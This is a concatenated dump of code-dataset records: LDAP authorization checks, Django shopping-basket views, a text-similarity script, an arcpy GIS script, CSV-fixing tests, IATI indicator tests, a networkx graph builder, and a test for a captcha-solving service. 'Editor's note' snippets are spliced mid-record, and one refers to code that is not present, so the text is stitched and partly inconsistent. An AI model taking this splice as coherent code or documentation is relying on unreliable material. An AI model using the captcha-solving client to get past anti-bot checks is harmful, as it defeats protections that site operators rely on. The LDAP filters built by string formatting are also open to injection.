accordingly\"\"\"\n\n    ldap_server = Server('ldap.epfl.ch', use_ssl=True, get_info=ALL)\n    conn = Connection(ldap_server, auto_bind=True)\n    base_dn = \"o=epfl,c=ch\"\n\n    # check if the user is dean\n    is_dean = False\n    filter = '(&(description;lang-en=school*)(unitManager={}))'.format(user.sciper)\n    conn.search(base_dn, filter, search_scope=LEVEL, attributes=['ou'])\n    for entry in conn.entries:\n        current_ou = min(entry['ou'], key=len)\n        if current_ou == 'STI':\n            is_dean = True\n            break\n    user.set_is_dean(is_dean)\n\n    # Check if the user manages institutes\n    # is_institute_manager = False\n    # managed_institutes = list()\n\n    # base_dn = 'ou=sti,o=epfl,c=ch'\n    # filter = '(&(description;lang-en=*institute*)(unitManager={}))'.format(user.sciper)\n    # conn.search(base_dn, filter, search_scope=LEVEL, attributes=['ou'])\n    # if len(conn.entries) > 0:\n    #     is_institute_manager = True\n    #     for entry in conn.entries:\n    #         managed_institutes.append(min(entry['ou'], key=len))\n\n    # user.is_institute_manager = is_institute_manager\n    # user.set_managed_institutes(managed_institutes)\n\n    # Check if the user is a prof\n    is_prof = False\n    base_dn = \"o=epfl,c=ch\"\n    filter = \"(&(uniqueIdentifier={})(|(memberOf=corps-enseignant-epfl)(memberOf=corps-enseignant-sti)(memberOf=enseignants-epfl)(memberOf=EnseignantsSTI)(memberOf=professeurs-epfl)(title;lang-en=*professor*)(userClass=Corp professoral)))\".format(user.sciper)\n    conn.search(base_dn, filter)\n    if len(conn.entries) > 0:\n        is_prof = True\n    user.set_is_prof(is_prof)\n\n    user.save()\n\n\nuser_logged_in.connect(check_authorizations)\n\n\n# objects not existing in the database\n\nclass NextStep(object):\n    def __init__(self, title=None, description=None, link=None):\n        self.title = title\n        self.description = description\n        self.link = 
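Editor's note: a minimal standalone sketch of the cycle-guard pattern the delegation walkers above rely on: thread a set (or list) of visited scipers through the recursion so that mutual delegation (A -> B -> A) terminates instead of recursing forever.

def walk_delegations(person_id, delegated_by, visited=None):
    visited = set() if visited is None else visited
    if person_id in visited:
        return []                      # already expanded: break the cycle
    visited.add(person_id)
    found = [person_id]
    for delegator in delegated_by.get(person_id, []):
        found.extend(walk_delegations(delegator, delegated_by, visited))
    return found

print(walk_delegations("A", {"A": ["B"], "B": ["A"]}))  # -> ['A', 'B'], no infinite loop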
link\n","sub_path":"sti_prof_dashboard/dashboard/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"639742877","text":"from django.shortcuts import render, redirect, reverse\nfrom django.contrib import messages\n\nfrom courses.models import Course\n\n\ndef view_basket(request):\n \"\"\" A view that renders basket page \"\"\"\n\n return render(request, 'basket/basket.html')\n\n\ndef add_to_basket(request, course_id):\n \"\"\" Add a quantity of the specified product to the shopping basket \"\"\"\n redirect_url = request.POST.get('redirect_url')\n basket = request.session.get('basket', {})\n course = Course.objects.get(pk=course_id)\n\n if course_id not in basket:\n basket[course_id] = course_id\n\n else:\n basket[course_id] = course_id\n messages.success(request, f'Added {course.name} to your basket')\n\n request.session['basket'] = basket\n return redirect(redirect_url)\n\n\ndef delete_from_basket(request, course_id):\n \"\"\"Delete item from cart\"\"\"\n\n course = Course.objects.get(pk=course_id)\n basket = request.session.get('basket', {})\n\n if course_id in basket:\n del basket[course_id]\n messages.success(request, f'Removed {course.name} from your bag')\n\n request.session['basket'] = basket\n return redirect(reverse('view_basket'))\n","sub_path":"basket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"514666956","text":"from itertools import chain\r\nfrom glob import glob\r\nimport string\r\nimport os\r\nimport math\r\nimport re\r\n\r\ndef frequence(filename):\r\n\t#words_to_lower(filename)\r\n\r\n\tlst = words_to_list(filename)\r\n\t#print(lst)\r\n\t#lst = remove(lst)\r\n\tdic = {}\r\n\tfor word in lst:\r\n\t\tif word in dic:\r\n\t\t\tdic[word]=dic[word]+1\r\n\t\telse:\r\n\t\t\tdic[word] = 1\r\n\tdic = remove_space(dic)\r\n\treturn dic\r\n\r\n# def words_to_lower(filename):\r\n# \tfile = open(filename,\"r\")\r\n# \tlines = [line.lower() for line in file]\r\n# \twith open(filename, 'w') as out:\r\n# \t\tout.writelines(lines)\r\n\r\n# \treturn file\r\n\r\ndef words_to_list(filename):\r\n\t#self.filename = filename\r\n\tlst = []\r\n\toriginal_string = open(filename).read()\r\n\tnew_string = re.sub('[^a-zA-Z0-9\\n]', ' ', original_string)\r\n\topen('temp.txt', 'w').write(new_string)\r\n\tfile1 = open(filename,'r')\r\n\tfor line in file1:\r\n\t\tlst.extend(line.lower().split())\r\n\r\n\treturn lst\r\n\r\n# def remove(lst):\r\n\r\n# \ttemplst = [word.strip(string.punctuation) for word in lst]\r\n\r\n# \treturn templst\r\n\r\ndef remove_space(dictionary):\r\n\tif '' in dictionary:\r\n\t\tdel dictionary['']\r\n\treturn dictionary\r\n\r\ndef dot_product(d1 = {},d2 = {}):\r\n\tdotresult = {}\r\n\tfor x in d1:\r\n\t\tif x in d2:\r\n\t\t\tdotresult[x] = d1[x] * d2[x]\r\n\r\n\tfor y in d2:\r\n\t\tif y in d1:\r\n\t\t\tdotresult[y] = d2[y]*d1[y]\r\n\r\n\treturn dotresult\r\n\r\ndef sum_dotproduct(d1 = {}):\r\n\ttotal = sum(d1.values())\r\n\treturn total\r\n\r\ndef square_dictvalues(d1 = {}):\r\n\ttotal = 0\r\n\tfor x in d1:\r\n\t\ttotal = total+ d1[x]**2\r\n\t#total = sum(d1.values())\r\n\treturn total\r\n\r\ndef similarity_function(a,b,c):\r\n\r\n\tresult = a/((b**(0.5))*(c** (0.5)))\r\n\r\n\treturn result#round(result,2)\r\n\r\n# file1 = open(\"Test.txt\",\"r\")\r\n# lines = [line.lower() for line in file1]\r\n# with open('Test.txt', 'w') as 
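Editor's note: a compact, self-contained sketch of the same bag-of-words cosine similarity that the frequence / dot_product / square_dictvalues helpers above compute, expressed over collections.Counter; the tokenisation mirrors the letters-and-digits regex used in words_to_list.

import math
import re
from collections import Counter

def cosine_similarity(text_a, text_b):
    a = Counter(re.findall(r"[a-z0-9]+", text_a.lower()))   # word-frequency vectors
    b = Counter(re.findall(r"[a-z0-9]+", text_b.lower()))
    dot = sum(a[w] * b[w] for w in a.keys() & b.keys())
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

print(round(cosine_similarity("the cat sat", "the cat ran") * 100.0, 2))  # 66.67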
out:\r\n# out.writelines(sorted(lines))\r\n\r\ndef bag_of_words(path):\r\n\tpathlist = [p for p in os.listdir(path) if p.endswith('.txt') and p != \"temp.txt\"]\r\n\t#print(pathlist)\r\n\tos.chdir(path)\r\n\tmatrix2 = []\r\n\r\n\tfor i in range(len(pathlist)):\r\n\t\tmatrix = []\r\n\t\tfile1 = frequence(pathlist[i])\r\n\t\tfor j in range(len(pathlist)):\r\n\t\t\tfiless1 = 0\r\n\t\t\tfile2 = frequence(pathlist[j])\r\n\t\t\tres = dot_product(file1,file2)\r\n\t\t\tsumi = sum_dotproduct(res)\r\n\t\t\tfiless1 = square_dictvalues(file1)\r\n\t\t\tfiless2 = square_dictvalues(file2)\r\n\t\t\tfinal = similarity_function(sumi,filess1,filess2) * 100.0\r\n\t\t\tmatrix.append(round(final,2))\r\n\t\tmatrix2.append(matrix)\r\n\r\n\treturn matrix2\r\n\r\n\r\n# file1 = frequence('Comands for github.txt')\r\n# print(file1)\r\n\r\n# file2 = frequence('Comands for github.txt')\r\n\r\n# print(file2)\r\n\r\n# res = dot_product(file1,file2)\r\n\r\n# print(\"res =\",res)\r\n\r\n# sumi = sum_dotproduct(res)\r\n\r\n# filess1 = square_dictvalues(file1)\r\n\r\n# filess2 = square_dictvalues(file2)\r\n\r\n# print(sumi,filess1,filess2)\r\n\r\n# print(similarity_function(sumi,filess1,filess2))\r\nuser_input = input(\"Please enter the path for comparison : \")\r\n\r\nfinal_result = bag_of_words(user_input)\r\n\r\nlistoffiles = [p for p in os.listdir(user_input) if p.endswith('.txt')]\r\n\r\nlistoffiles = [\" \"]+listoffiles\r\n\r\n#print(listoffiles)\r\n\r\n# for x in listoffiles:\r\n# \tprint(x,\" \",end='')\r\n\r\n\r\nfor x in range(len(final_result)):\r\n\tfor y in range(len(final_result[x])):\r\n\t\tprint(final_result[x][y], \" \",end='')\r\n\tprint(\"\\n\")\r\n#print(test)","sub_path":"bag_of_wordsv2.0.py","file_name":"bag_of_wordsv2.0.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"404052552","text":"# checks for project, clip, calculate length, get_anode_bnode\nimport arcpy\nimport os\nimport pandas\nfrom merge import *\nimport math\n\narcpy.env.overwriteOutput = True\n\nfeature_layer = \"fl\"\nmf = \"m_feature\"\n\n# same projection for all\nsr_wgs1984 = arcpy.SpatialReference(4326)\n\nlist_of_shp = os.listdir(shp_folder)\nlist_of_shp = [x for x in list_of_shp if '.shp' in x]\nlist_of_shp = [x for x in list_of_shp if 'lock' not in x]\n\ndef get_where_clause(colname, list_of_link_ids):\n wh_cl = \"\"\n for id in list_of_link_ids:\n wh_cl = wh_cl + \"\"\"\"{0}\" = {1} OR \"\"\".format(colname, id)\n return wh_cl[:-4]\n\n# create clip shp\narcpy.MakeFeatureLayer_management(all_area_shp, all_area_shp_f)\nwhere_clause = get_where_clause(\"ABBR\", clip_state_list)\narcpy.SelectLayerByAttribute_management(all_area_shp_f, \"NEW_SELECTION\", where_clause)\n\narcpy.CopyFeatures_management(all_area_shp_f,m)\narcpy.Dissolve_management(m, clip_area_shp, \"\", \"\", \"SINGLE_PART\", \"\")\n\nfor shp in list_of_shp:\n m = shp_folder + shp\n sr_curr_network = arcpy.Describe(m).spatialReference\n # project it to specified projection if else\n if sr_curr_network.name != sr_wgs1984.name:\n print(\"Projecting to WGS1984...\")\n arcpy.Project_management(m, temp_temp, sr_wgs1984)\n arcpy.CopyFeatures_management(temp_temp, m1)\n else:\n arcpy.CopyFeatures_management(m, m1)\n\n arcpy.MakeFeatureLayer_management(m1, mf)\n clip_area_shp\n arcpy.SelectLayerByLocation_management(mf,\"COMPLETELY_WITHIN\",clip_area_shp)\n arcpy.CopyFeatures_management(mf, m2)\n print(\"Clipping to desired area...\")\n #\n # check for multipart features\n 
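Editor's note: get_where_clause above appends " OR " after every term and then slices it back off with [:-4]; an equivalent sketch using str.join avoids the trailing-separator bookkeeping (illustrative name, same output).

def get_where_clause_joined(colname, ids):
    return " OR ".join('"{0}" = {1}'.format(colname, i) for i in ids)

print(get_where_clause_joined("ABBR", [8, 12]))  # "ABBR" = 8 OR "ABBR" = 12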
multipart_dict = {}\n with arcpy.da.SearchCursor(m2, [\"OBJECTID\", \"SHAPE@\"]) as cursor:\n for row in cursor:\n count = row[1].partCount\n if count > 1:\n multipart_dict.setdefault(row[0], []).append(count)\n #\n if len(multipart_dict.keys()) > 0:\n print (\"Please fix multipart on {0} and run again\".format(shp))\n print(\"LinkID: {0}:\".format(multipart_dict))\n pandas.DataFrame(multipart_dict).to_csv(multipart_csv)\n exit(0)\n # put FID, miles, ANODE and BNODE on each\n fieldnames = [f.name for f in arcpy.ListFields(m2)]\n fieldnames = [x for x in fieldnames if x not in (\"FID\", \"Shape\", \"OBJECTID\")]\n # print fieldnames\n # remove everything except\n arcpy.DeleteField_management(m2, fieldnames)\n #add points\n print (\"Adding Coordinates to points...\")\n arcpy.FeatureVerticesToPoints_management(m2, p1, \"BOTH_ENDS\")\n #\n arcpy.DeleteIdentical_management(p1, ['Shape'])\n #\n arcpy.AddField_management(p1, \"_ID_\", \"LONG\")\n arcpy.CalculateField_management(p1, \"_ID_\", '!FID!', \"PYTHON\")\n #\n arcpy.AddField_management(m2, \"_ID_\", \"LONG\")\n arcpy.AddField_management(m2, \"_LEN_\", \"DOUBLE\")\n arcpy.AddField_management(m2, \"_A_\", \"LONG\")\n arcpy.AddField_management(m2, \"_B_\", \"LONG\")\n arcpy.CalculateField_management(m2, \"_ID_\", '!FID!', \"PYTHON\")\n arcpy.CalculateField_management(m2, \"_LEN_\", '!Shape.length@miles!', \"PYTHON\")\n #\n # creating coord-id dict\n coord_to_node_dict = {}\n with arcpy.da.SearchCursor(p1, [\"SHAPE@XY\",\"_ID_\"], spatial_reference = sr_wgs1984) as cursor:\n for coord,id in cursor:\n coord_to_node_dict[coord[0],coord[1]] = id\n #\n with arcpy.da.UpdateCursor(m2, [\"SHAPE@\", \"_A_\", \"_B_\"], spatial_reference = sr_wgs1984 ) as cursor:\n for row in cursor:\n # get the exact coordinates and map it to the ID\n coord_start = (row[0].firstPoint.X, row[0].firstPoint.Y)\n coord_end = (row[0].lastPoint.X, row[0].lastPoint.Y)\n row[1] = coord_to_node_dict[coord_start]\n row[2] = coord_to_node_dict[coord_end]\n cursor.updateRow(row)\n #\n arcpy.CopyFeatures_management(m2, intermediate_folder + shp)\n arcpy.CopyFeatures_management(p1, intermediate_folder + \"pt_\" + shp)","sub_path":"merge_maps(c2)/simplify.py","file_name":"simplify.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"757886","text":"#!/usr/bin/python3\n\nfrom imagetyperzapi3.imagetyperzapi import ImageTyperzAPI\n\ndef test_api():\n access_token = 'access_token_here'\n # get access token from: http://www.imagetyperz.com/Forms/ClientHome.aspx\n ita = ImageTyperzAPI(access_token) # init imagetyperz api obj\n\n # check account balance\n balance = ita.account_balance() # get account balance\n print('Balance: {}'.format(balance)) # print balance\n\n print('Waiting for captcha to be solved ...')\n # works with URL too, if authenticated using token\n captcha_id = ita.submit_image('captcha.jpg')\n # optional parameters for image captcha\n # captcha_id = ita.solve_captcha('captcha.jpg', is_case_sensitive = False, is_phrase = False, digits_only = False, letters_only = True, is_math = False, min_length = 2, max_length = 10)\n response = ita.retrieve_response(captcha_id)\n print('Response: {}'.format(response)) # print response of captcha\n\n# main method\ndef main():\n try:\n test_api() # test captcha API\n except Exception as ex:\n print('[!] 
Error occured: {}'.format(ex))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"319581872","text":"from contextlib import contextmanager, redirect_stdout\nfrom io import StringIO\nimport imp\nimport os\nimport sys\nfrom textwrap import dedent\nfrom tempfile import NamedTemporaryFile\nimport unittest\n\n\nclass FixCSVTests(unittest.TestCase):\n\n \"\"\"Tests for fix_csv.py\"\"\"\n\n maxDiff = None\n\n def test_pipe_file_to_csv_file(self):\n old_contents = dedent(\"\"\"\n 2012|Lexus|LFA\n 2009|GMC|Yukon XL 1500\n 1965|Ford|Mustang\n 2005|Hyundai|Sonata\n 1995|Mercedes-Benz|C-Class\n \"\"\").lstrip()\n expected = dedent(\"\"\"\n 2012,Lexus,LFA\n 2009,GMC,Yukon XL 1500\n 1965,Ford,Mustang\n 2005,Hyundai,Sonata\n 1995,Mercedes-Benz,C-Class\n \"\"\").lstrip()\n with make_file(old_contents) as old, make_file(\"\") as new:\n output = run_program('fix_csv.py', args=[old, new])\n with open(new) as new_file:\n new_contents = new_file.read()\n self.assertEqual(expected, new_contents)\n self.assertEqual(\"\", output)\n\n def test_original_file_is_unchanged(self):\n old_contents = dedent(\"\"\"\n 2012|Lexus|LFA\n 2009|GMC|Yukon XL 1500\n \"\"\").lstrip()\n with make_file(old_contents) as old, make_file(\"\") as new:\n run_program('fix_csv.py', args=[old, new])\n with open(old) as old_file:\n contents = old_file.read()\n self.assertEqual(old_contents, contents)\n\n @unittest.expectedFailure\n def test_delimiter_in_output(self):\n old_contents = dedent(\"\"\"\n 02|Waylon Jennings|Honky Tonk Heroes (Like Me)\n 04|Kris Kristofferson|To Beat The Devil\n 11|Johnny Cash|Folsom Prison Blues\n 13|Billy Joe Shaver|Low Down Freedom\n 21|Hank Williams III|Mississippi Mud\n 22|David Allan Coe|Willie, Waylon, And Me\n 24|Bob Dylan|House Of The Risin' Sun\n \"\"\").lstrip()\n expected = dedent(\"\"\"\n 02,Waylon Jennings,Honky Tonk Heroes (Like Me)\n 04,Kris Kristofferson,To Beat The Devil\n 11,Johnny Cash,Folsom Prison Blues\n 13,Billy Joe Shaver,Low Down Freedom\n 21,Hank Williams III,Mississippi Mud\n 22,David Allan Coe,\"Willie, Waylon, And Me\"\n 24,Bob Dylan,House Of The Risin' Sun\n \"\"\").lstrip()\n with make_file(old_contents) as old, make_file(\"\") as new:\n output = run_program('fix_csv.py', args=[old, new])\n with open(new) as new_file:\n new_contents = new_file.read()\n self.assertEqual(expected, new_contents)\n self.assertEqual(\"\", output)\n\n @unittest.expectedFailure\n def test_call_with_too_many_files(self):\n with make_file(\"\") as old, make_file(\"\") as new:\n with self.assertRaises(BaseException):\n run_program('fix_csv.py', args=[old, new, old])\n\n\ndef run_program(path, args=[]):\n \"\"\"\n Run program at given path with given arguments.\n\n If raises is specified, ensure the given exception is raised.\n \"\"\"\n old_args = sys.argv\n assert all(isinstance(a, str) for a in args)\n try:\n sys.argv = [path] + args\n with redirect_stdout(StringIO()) as output:\n try:\n if '__main__' in sys.modules:\n del sys.modules['__main__']\n imp.load_source('__main__', path)\n except SystemExit as e:\n if e.args != (0,):\n raise\n del sys.modules['__main__']\n return output.getvalue()\n finally:\n sys.argv = old_args\n\n\n@contextmanager\ndef make_file(contents=None):\n \"\"\"Context manager providing name of a file containing given contents.\"\"\"\n with NamedTemporaryFile(mode='wt', encoding='utf-8', delete=False) as 
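Editor's note: a tiny standalone demo (not from the test file) of the redirect_stdout + StringIO capture that run_program above uses to collect the tested script's printed output.

from contextlib import redirect_stdout
from io import StringIO

with redirect_stdout(StringIO()) as output:
    print("captured, not shown on the terminal")
assert output.getvalue() == "captured, not shown on the terminal\n"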
f:\n if contents:\n f.write(contents)\n try:\n yield f.name\n finally:\n os.remove(f.name)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","sub_path":"oreilly_code_refactoring_training/test_fix_csv.py","file_name":"test_fix_csv.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"298879085","text":"import csv\nfrom os.path import dirname, join\n\nfrom flask import current_app\nimport iatikit\nfrom bdd_tester import BDDTester\n\nfrom . import utils\n\n\ndef get_current_countries(publisher, current_data):\n country_codes = []\n\n for dataset in publisher.datasets:\n for idx, activity in enumerate(dataset.activities):\n if dataset.name not in current_data or idx not in current_data[dataset.name] or current_data[dataset.name][idx] is False:\n continue\n country_codes += activity.etree.xpath('recipient-country/@code')\n country_codes = list(set(country_codes))\n return country_codes\n\n\ndef country_strategy_or_mou(org, snapshot_date, test_name,\n current_data_results):\n iati_result_path = current_app.config.get('IATI_RESULT_PATH')\n output_filepath = join(iati_result_path,\n snapshot_date, org.organisation_code,\n utils.slugify(test_name) + '.csv')\n\n iati_data_path = current_app.config.get('IATI_DATA_PATH')\n snapshot_xml_path = join(iati_data_path, snapshot_date)\n publisher = iatikit.data(snapshot_xml_path).publishers.get(\n org.registry_slug)\n\n current_country_codes = get_current_countries(\n publisher, current_data_results)\n\n if current_country_codes == []:\n return\n\n country_strategies = {}\n for dataset in publisher.datasets:\n for idx, activity in enumerate(dataset.activities):\n if dataset.name not in current_data_results or idx not in current_data_results[dataset.name] or current_data_results[dataset.name][idx] is False:\n continue\n mous = activity.etree.xpath('document-link[category/@code=\"A09\"]')\n if mous == []:\n continue\n for c in activity.etree.xpath('recipient-country/@code'):\n country_strategies[c] = {\n 'dataset': dataset.name,\n 'identifier': activity.id,\n 'index': idx,\n 'result': 'pass',\n 'hierarchy': activity.etree.get('hierarchy', '1'),\n 'explanation': 'A09 found for {}',\n }\n\n for idx, organisation in enumerate(dataset.organisations):\n org_level_docs = organisation.etree.xpath(\n 'document-link[category/@code=\"B03\"]/recipient-country/@code')\n org_level_docs += organisation.etree.xpath(\n 'document-link[category/@code=\"B13\"]/recipient-country/@code')\n org_level_docs = list(set(org_level_docs))\n for c in org_level_docs:\n country_strategies[c] = {\n 'dataset': dataset.name,\n 'identifier': organisation.id,\n 'index': idx,\n 'result': 'pass',\n 'hierarchy': 1,\n 'explanation': 'B03 or B13 found for {}',\n }\n\n default_row = {\n 'dataset': '',\n 'identifier': '',\n 'index': 0,\n 'result': 'fail',\n 'hierarchy': 1,\n 'explanation': 'No country strategy or MoU found for {}',\n }\n fieldnames = ['dataset', 'identifier', 'index', 'result',\n 'hierarchy', 'explanation']\n with open(output_filepath, 'w') as handler:\n writer = csv.DictWriter(handler, fieldnames=fieldnames)\n writer.writeheader()\n for country_code in current_country_codes:\n row = country_strategies.get(country_code, dict(default_row))\n row['explanation'] = row['explanation'].format(country_code)\n writer.writerow(row)\n\n\ndef disaggregated_budget(org, snapshot_date, test_name,\n current_data_results, condition):\n iati_result_path = 
current_app.config.get('IATI_RESULT_PATH')\n output_filepath = join(iati_result_path,\n snapshot_date, org.organisation_code,\n utils.slugify(test_name) + '.csv')\n\n iati_data_path = current_app.config.get('IATI_DATA_PATH')\n snapshot_xml_path = join(iati_data_path, snapshot_date)\n publisher = iatikit.data(snapshot_xml_path).publishers.get(\n org.registry_slug)\n\n codelists = iatikit.codelists()\n current_country_codes = get_current_countries(\n publisher, current_data_results)\n\n disaggregated_budget_tmpl = '''@iati-organisation\nFeature: Total disaggregated budget\n\n Scenario: Country budget available one year forward\n Given file is an organisation file\n Then `recipient-country-budget[recipient-country/@code=\"{country_code}\"]` should be available 1 year forward\n\n Scenario: Country budget available two years forward\n Given file is an organisation file\n Then `recipient-country-budget[recipient-country/@code=\"{country_code}\"]` should be available 2 years forward\n\n Scenario: Country budget available three years forward\n Given file is an organisation file\n Then `recipient-country-budget[recipient-country/@code=\"{country_code}\"]` should be available 3 years forward\n '''\n base_path = join(dirname(current_app.root_path),\n 'index_indicator_definitions', 'test_definitions')\n step_definitions = join(base_path, 'step_definitions.py')\n tester = BDDTester(step_definitions)\n\n explanation_tmpl = 'Budget for {country_code} {found} ' + \\\n '{year} year{plural} forward'\n fieldnames = ['dataset', 'identifier', 'index', 'result',\n 'hierarchy', 'explanation']\n with open(output_filepath, 'w') as handler:\n writer = csv.DictWriter(handler, fieldnames=fieldnames)\n writer.writeheader()\n for country_code in current_country_codes:\n feature = tester._gherkinify_feature(\n disaggregated_budget_tmpl.format(country_code=country_code))\n for dataset in publisher.datasets:\n for idx, organisation in enumerate(dataset.organisations):\n\n if condition:\n activity_condition, org_condition = condition.split('|')\n\n if org_condition.strip() and not organisation.etree.xpath(org_condition):\n continue\n\n for year, test in enumerate(feature.tests):\n result = test(\n organisation.etree,\n today=snapshot_date,\n codelists=codelists)\n explanation = explanation_tmpl.format(\n country_code=country_code,\n found='found' if result else 'not found',\n year=year + 1,\n plural='s' if year > 0 else '',\n )\n writer.writerow({\n 'dataset': dataset.name,\n 'identifier': organisation.id,\n 'index': idx,\n 'result': 'pass' if result else 'fail',\n 'hierarchy': 1,\n 'explanation': explanation,\n })\n","sub_path":"beta/infotest.py","file_name":"infotest.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"48613067","text":"import time\nimport math\nimport networkx as nx\nimport csv \nimport json\n\n#clases\n#class Nodo():\n# def __init__(id, coordenada_x, coordenada_y):\n# self.id = id\n# self.coordenada_x = coordenada_x\n# self.coordenada_y = coordenada_y\n\n#lectura archivo eventos.csv\nwith open('eventos.csv') as eventos:\n lista_eventos = []\n contador = 0\n for i in csv.reader(eventos):\n \n lista_eventos.append(i[0])\n contador += 1\n\n\ndef calcular_distancia(coordenada_x1, coordenada_y1, coordenada_x2, coordenada_y2):\n distancia = ((float(coordenada_y2) - float(coordenada_y1))**2 + (float(coordenada_x2) - float(coordenada_x1))**2)**(0.5)\n return distancia\n\ndef nodo_mas_cercano(coordenada_x_evento, 
coordenada_y_evento, Grafo):\n contador = 0\n for diccionario_nodo in Grafo.nodes.values():\n id_nodo = diccionario_nodo[\"Id\"]\n coordenada_x_nodo = diccionario_nodo[\"Coordenada x\"]\n coordenada_y_nodo = diccionario_nodo[\"Coordenada y\"]\n distancia = calcular_distancia(coordenada_x_evento, coordenada_y_evento, coordenada_x_nodo, coordenada_y_nodo)\n if contador > 0:\n if distancia < distancia_minima_hasta_el_momento:\n distancia_minima_hasta_el_momento = distancia\n id_nodo_hasta_el_momento = id_nodo\n else:\n distancia_minima_hasta_el_momento = distancia\n id_nodo_hasta_el_momento = id_nodo\n contador += 1\n return id_nodo_hasta_el_momento\n\n\n#creación del grafo utilizando la librería de networkx\nGrafo = nx.DiGraph()\n\n#lectura archivo nodos.csv\nwith open('nodos.csv') as nodos:\n lista_nodos = []\n contador = 0\n for i in csv.reader(nodos):\n if contador > 0:\n lista_nodos.append(i)\n contador += 1\n\n\n#agregación al grafo de los nodos de nodos.csv, a un diccionario de nodos, donde cada llave del diccionario es el id del nodo, y el value es otro diccionario con llaves \"Id\", \"Coordenada x\" y \"Coordenada y\" y values los valores correspondientes \nfor nodo in lista_nodos:\n informacion_nodo = nodo[0]\n lista_informacion_nodo = informacion_nodo.split(\";\")\n id_nodo = int(lista_informacion_nodo[0])\n coordenada_x_nodo = float(lista_informacion_nodo[1])\n coordenada_y_nodo = float(lista_informacion_nodo[2])\n Grafo.add_node(id_nodo)\n Grafo.nodes[id_nodo][\"Id\"] = id_nodo\n Grafo.nodes[id_nodo][\"Coordenada x\"] = coordenada_x_nodo\n Grafo.nodes[id_nodo][\"Coordenada y\"] = coordenada_y_nodo\n\n\n#lectura archivo arcos.csv \nwith open('arcos.csv') as calles:\n lista_calles = []\n contador = 0\n for i in csv.reader(calles):\n if contador > 0:\n lista_calles.append(i)\n contador += 1\n\nfor calle in lista_calles:\n informacion_calle = calle[0]\n lista_informacion_calle = informacion_calle.split(\";\")\n id_nodo_origen = int(lista_informacion_calle[0])\n id_nodo_destino = int(lista_informacion_calle[1])\n v0 = float(lista_informacion_calle[2])\n v1 = float(lista_informacion_calle[3])\n v2 = float(lista_informacion_calle[4])\n v3 = float(lista_informacion_calle[5])\n v4 = float(lista_informacion_calle[6])\n v5 = float(lista_informacion_calle[7])\n v6 = float(lista_informacion_calle[8])\n v7 = float(lista_informacion_calle[9])\n v8 = float(lista_informacion_calle[10])\n v9 = float(lista_informacion_calle[11])\n v10 = float(lista_informacion_calle[12])\n v11 = float(lista_informacion_calle[13])\n v12 = float(lista_informacion_calle[14])\n v13 = float(lista_informacion_calle[15])\n v14 = float(lista_informacion_calle[16])\n v15 = float(lista_informacion_calle[17])\n v16 = float(lista_informacion_calle[18])\n v17 = float(lista_informacion_calle[19])\n v18 = float(lista_informacion_calle[20])\n v19 = float(lista_informacion_calle[21])\n v20 = float(lista_informacion_calle[22])\n v21 = float(lista_informacion_calle[23])\n v22 = float(lista_informacion_calle[24])\n v23 = float(lista_informacion_calle[25])\n\n cola_arco = id_nodo_origen\n cabeza_arco = id_nodo_destino\n\n nodo_origen = Grafo.nodes[id_nodo_origen]\n nodo_destino = Grafo.nodes[id_nodo_destino]\n\n #x1,y1,x2,y2\n distancia_arco = calcular_distancia(nodo_origen[\"Coordenada x\"], nodo_origen[\"Coordenada y\"], nodo_destino[\"Coordenada x\"], nodo_destino[\"Coordenada y\"])\n\n Grafo.add_edge(cola_arco, cabeza_arco)\n Grafo.edges[cola_arco, cabeza_arco][\"Distancia\"] = distancia_arco\n Grafo.edges[cola_arco, 
cabeza_arco][\"Tiempo 0\"] = distancia_arco / v0\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 1\"] = distancia_arco / v1\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 2\"] = distancia_arco / v2\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 3\"] = distancia_arco / v3\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 4\"] = distancia_arco / v4\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 5\"] = distancia_arco / v5\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 6\"] = distancia_arco / v6\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 7\"] = distancia_arco / v7\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 8\"] = distancia_arco / v8\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 9\"] = distancia_arco / v9\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 10\"] = distancia_arco / v10\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 11\"] = distancia_arco / v11\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 12\"] = distancia_arco / v12\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 13\"] = distancia_arco / v13\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 14\"] = distancia_arco / v14\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 15\"] = distancia_arco / v15\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 16\"] = distancia_arco / v16\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 17\"] = distancia_arco / v17\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 18\"] = distancia_arco / v18\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 19\"] = distancia_arco / v19\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 20\"] = distancia_arco / v20\n 